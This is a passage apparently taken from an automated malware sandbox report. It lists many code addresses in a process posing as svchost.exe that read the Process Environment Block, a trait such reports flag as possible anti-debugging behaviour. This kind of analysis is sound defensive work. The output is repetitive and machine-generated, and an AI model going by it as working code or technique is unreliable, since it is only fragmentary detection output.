                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
